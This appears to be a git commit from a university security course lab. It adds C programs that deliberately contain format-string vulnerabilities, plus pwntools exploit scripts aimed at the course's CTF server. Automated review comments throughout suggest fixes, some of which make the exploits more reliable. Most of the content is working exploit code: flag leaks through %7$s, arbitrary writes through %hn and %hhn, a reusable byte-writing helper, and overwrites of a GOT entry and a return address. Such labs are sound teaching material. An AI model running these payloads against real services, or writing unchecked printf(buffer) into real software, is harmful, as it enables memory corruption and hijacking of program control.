2026-01-08 19:16:57 +00:00
parent 555b9062f3
commit 82e15702a7
22 changed files with 376 additions and 0 deletions

BIN
pa/lab7/01_local_read Executable file


20
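--- a/pa/lab7/01_local_read.c
+++ b/pa/lab7/01_local_read.c
@@ -0,0 +1,20 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+#define BUFFER_LEN 64
+char buffer[BUFFER_LEN] = {0};
+void vuln() {
+// Never prints secret_value
+char *secret_value = get_flag();
+printf(buffer);
+}
+int main() {
+read(0, buffer, BUFFER_LEN-1);
+vuln();
+}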
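Review bot: With the `-Wall -Wextra` flags given in the build line, `char *secret_value = get_flag();` is assigned and never read, so gcc reports -Wunused-variable, and with optimisation enabled the stack slot the challenge depends on could be elided. If the pointer is meant to stay on `vuln`'s stack as the leak target, pin it with `char *volatile secret_value = get_flag();` (or at least `(void)secret_value;`) and extend the comment to `// Never printed on purpose: the pointer only sits on the stack for the format-string leak`. The unchecked `read()` return is harmless here because `buffer` is zero-initialised and the read is bounded to BUFFER_LEN-1, so it stays NUL-terminated.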

BIN
pa/lab7/03_write Executable file


27
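--- a/pa/lab7/03_write.c
+++ b/pa/lab7/03_write.c
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+#define BUFFER_LEN 128
+unsigned int target = 0;
+void vuln() {
+char buffer[BUFFER_LEN] = {0};
+read(0, buffer, BUFFER_LEN-1);
+printf(buffer);
+if (target != 0) {
+printf("Success! You hit the target!\n");
+printf("Here is your flag: %s\n", get_flag());
+} else {
+printf("Oops, not quite!\n");
+}
+}
+int main() {
+vuln();
+}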
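Review bot: `unsigned int target = 0;` carries no comment explaining why it is a zero-initialised global rather than a local, and that is the property the exercise hinges on: it lands in .bss and, because the build line passes `-no-pie`, at a fixed address a solver can hard-code. A one-liner such as `// global in .bss: fixed address under -no-pie, the format-string write target` would make the intent visible. `printf(buffer)` with a non-literal format is the intended sink, but on toolchains that enable -Wformat-security by default the build line will warn; either note that in the comment or add `-Wno-format-security` to the documented flags.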

BIN
pa/lab7/04_match_value Executable file


27
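--- a/pa/lab7/04_match_value.c
+++ b/pa/lab7/04_match_value.c
@@ -0,0 +1,27 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+#include <stdio.h>
+#include <unistd.h>
+#include "get_flag.h"
+#define BUFFER_LEN 128
+unsigned int target = 0;
+void vuln() {
+char buffer[BUFFER_LEN] = {0};
+read(0, buffer, BUFFER_LEN-1);
+printf(buffer);
+if (target == 327) {
+printf("Success! You hit the target!\n");
+printf("Here is your flag: %s\n", get_flag());
+} else {
+printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target);
+}
+}
+int main() {
+vuln();
+}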
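Review bot: The failure message formats `target`, declared `unsigned int`, with `%d`, so any value at or above 0x80000000 written by a solver is reported as negative; use `%u` (`printf("Oops, not quite! The target was: 327\nCurrent value is %u.\n", target);`). The sibling files already print the same variable as `%x` / `0x%08x`, so settling on one unsigned format across the lab would also keep the hints consistent.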



@@ -0,0 +1,29 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target_before = 0;
unsigned int target = 0;
unsigned int target_after = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (((target >> 24) & 0xff) == 2) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24);
}
}
int main() {
vuln();
}
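Review bot: The success condition `((target >> 24) & 0xff) == 2` is undocumented, and which byte it inspects matters for the exercise: on 32-bit x86 (little-endian, per the `-m32` build line) the most-significant byte is the one at `(char *)&target + 3`, so a comment such as `// checks the top byte of target: on little-endian x86 that is the byte at &target + 3` would save readers a detour. `target_before` and `target_after` are never referenced; if they are guard words so that an over-wide write does not spill into anything else, say so in a comment, since -Wall is silent on unused non-static globals. The `& 0xff` is redundant after shifting a 32-bit `unsigned int` by 24 but harmless.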

BIN
pa/lab7/06_write_big_number Executable file



@@ -0,0 +1,29 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <unistd.h>
#include "get_flag.h"
#define BUFFER_LEN 128
unsigned int target_before = 0;
unsigned int target = 0;
unsigned int target_after = 0;
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
if (target == 0xdeadbeef) {
printf("Success! You hit the target!\n");
printf("Here is your flag: %s\n", get_flag());
} else {
printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target);
}
}
int main() {
vuln();
}

BIN
pa/lab7/07_call_functions Executable file



@@ -0,0 +1,24 @@
// gcc -m32 -Wall -Wextra -ggdb -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_LEN 128
void win() {
printf("You win!");
system("cat /home/ctf/flag");
}
void vuln() {
char buffer[BUFFER_LEN] = {0};
read(0, buffer, BUFFER_LEN-1);
printf(buffer);
puts("Bye!\n");
}
int main() {
vuln();
}
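Review bot: `printf("You win!")` in `win` writes no newline and nothing flushes stdout before `system("cat /home/ctf/flag")`; when stdout is a pipe or socket rather than a tty, stdio is fully buffered, so the banner is held back while the child `cat` writes directly to fd 1, and the output arrives in the wrong order or not at all if the process dies before `exit()` flushes. `puts("You win!"); fflush(stdout);` fixes both. `puts("Bye!\n")` also emits two newlines, since `puts` appends its own; `puts("Bye!")` is presumably what was meant.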

BIN
pa/lab7/08_return Executable file


23
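--- a/pa/lab7/08_return.c
+++ b/pa/lab7/08_return.c
@@ -0,0 +1,23 @@
+// gcc -m32 -Wall -Wextra -ggdb -no-pie
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#define BUFFER_LEN 128
+void win() {
+printf("You win!");
+system("cat /home/ctf/flag");
+}
+void vuln() {
+char buffer[BUFFER_LEN] = {0};
+read(0, buffer, BUFFER_LEN-1);
+printf(buffer);
+}
+int main() {
+vuln();
+}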
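Review bot: `win` prints `"You win!"` without a newline and never flushes before `system("cat /home/ctf/flag")`, and in this binary that is more than cosmetic: `win` is only ever reached through a corrupted return address, so when it returns it will most likely crash instead of reaching `exit()`, and the unflushed banner is lost while `cat`'s output (written straight to fd 1) still appears. `puts("You win!"); fflush(stdout);` makes the banner reliable regardless of how `win` is entered. The `win`/`vuln` pair is otherwise a copy of 07_call_functions.c; a shared header would keep the two from drifting.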


@@ -0,0 +1,42 @@
from pwn import remote, process, p32, ELF
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
write = f"%{n}x%{arg_n}$hhn"
print(write)
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25197
conn = remote(HOST, PORT)
#conn = process("07_call_functions")
#input()
elf = ELF("07_call_functions")
got_puts = elf.got['puts']
win = elf.sym['win']
pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")
#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)
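Review bot: `if n < 8: n += 256` in `print_to_ram` does not enforce the minimum field width it is there for: when the byte to write is far below `cum_chars % 256` (e.g. byte 0x02 after 0xfc characters) n is -250 and a single +256 leaves 6, so `%6x` may emit up to eight hex digits and every subsequent `%hhn` is off; use `while n < 8: n += 256`. The receive loop can also die with `EOFError`, because `conn.connected()` may still be true after the service has closed the socket and `conn.recv(1)` then raises; `print(conn.recvall().decode(errors="replace"))` collects the reply safely. The GOT overwrite of `puts` presumes the binary is not linked with full RELRO, which `elf.relro` from pwntools would confirm before sending.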


@@ -0,0 +1,12 @@
from pwn import remote
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25191
conn = remote(HOST, PORT)
pl = b"%7$s\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)
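Review bot: The byte-at-a-time loop races the peer: `conn.connected()` can still report the socket open after the service has closed it, at which point `conn.recv(1)` raises `EOFError` and the script ends with a traceback after the flag. `print(conn.recvall().decode(errors="replace"))` reads everything up to EOF and drops the per-byte `chr()` round-trip. A short comment on `pl = b"%7$s\n"` saying that 7 is the format-argument index at which the leaked pointer (presumably `secret_value` on `vuln`'s stack) was found would tell a reader where the number came from.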


@@ -0,0 +1,41 @@
from pwn import remote, process, p32, ELF
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
write = f"%{n}x%{arg_n}$hhn"
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25198
conn = remote(HOST, PORT)
#conn = process("08_return")
#input()
elf = ELF("08_return")
# dest local is ffffcc1c, which is 1$ + 144
# remote 1$ is ffffdc6c, so dest should be ffffdc5c
dest = 0xffffdcfc
win = elf.sym['win']
pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n"
print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n")
#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
conn.interactive()
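Review bot: The comment `# remote 1$ is ffffdc6c, so dest should be ffffdc5c` contradicts the assignment that follows it, `dest = 0xffffdcfc`; one of the two is stale, and for a one-shot stack-address guess the comment is exactly what the next reader has to trust. Replace it with the offset actually used and how it was derived (e.g. `# dest = leaked 1$ + <offset>, measured locally with gdb`). Note also that the `%3$08x` appended after the writes only prints once the `%hhn` writes to `dest` have happened, so its leak cannot inform the guess within the same run.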


@@ -0,0 +1,12 @@
from pwn import remote
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25192
conn = remote(HOST, PORT)
pl = b"%7$s\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)


@@ -0,0 +1,38 @@
from pwn import remote, process, p32
# Does not deal with \0s in any pointers needed
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
addrs: bytes = b""
writes: bytes = b""
cum_chars: int = 4 * len(data)
for offset in range(len(data)):
addr = base + offset
addrs += p32(addr)
arg_n = arg_base + offset
n = data[offset] - (cum_chars % 256)
if n < 8: n += 256
print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
write = f"%{n}x%{arg_n}$hhn"
print(write)
writes += write.encode('utf-8')
cum_chars += n
pl = addrs + writes
if b"\0" in pl: raise Exception("Payload requires a \\0")
return pl
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25196
conn = remote(HOST, PORT)
#conn = process("06_write_big_number")
#input()
pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")
#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)
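Review bot: `print_to_ram` is copy-pasted here and into the 07 and 08 exploit scripts, differing only in debug prints, so any correction to its width arithmetic has to be made three times; move it into one module (say `fmtwrite.py`) and import it. The target address `0x804c044` is hard-coded while the 07 script resolves symbols through `ELF(...)`; `ELF("06_write_big_number").sym['target']` keeps this script valid if the binary is rebuilt. A docstring on the helper stating what it assumes (the packed addresses start at format argument `arg_base`, one little-endian `%hhn` per byte, no NUL bytes in any address) would also help.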


@@ -0,0 +1,18 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25195
conn = remote(HOST, PORT)
#conn = process("05_write_specific_byte")
#input()
tgt_addr = p32(0x804c044+3)
#2 + 256 - 4(ptr) = 254
pl = tgt_addr+b"%0254x%7$hhn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)


@@ -0,0 +1,18 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194
conn = remote(HOST, PORT)
#conn = process("04_match_value")
#input()
tgt_addr = p32(0x804c040)
#327 - 4(ptr) = 323
pl = tgt_addr+b"%0323x%7$hn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)


@@ -0,0 +1,16 @@
from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25193
conn = remote(HOST, PORT)
#conn = process("03_write")
#input()
tgt_addr = p32(0x804c040)
pl = tgt_addr+b"AAAA.%7$hhn\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)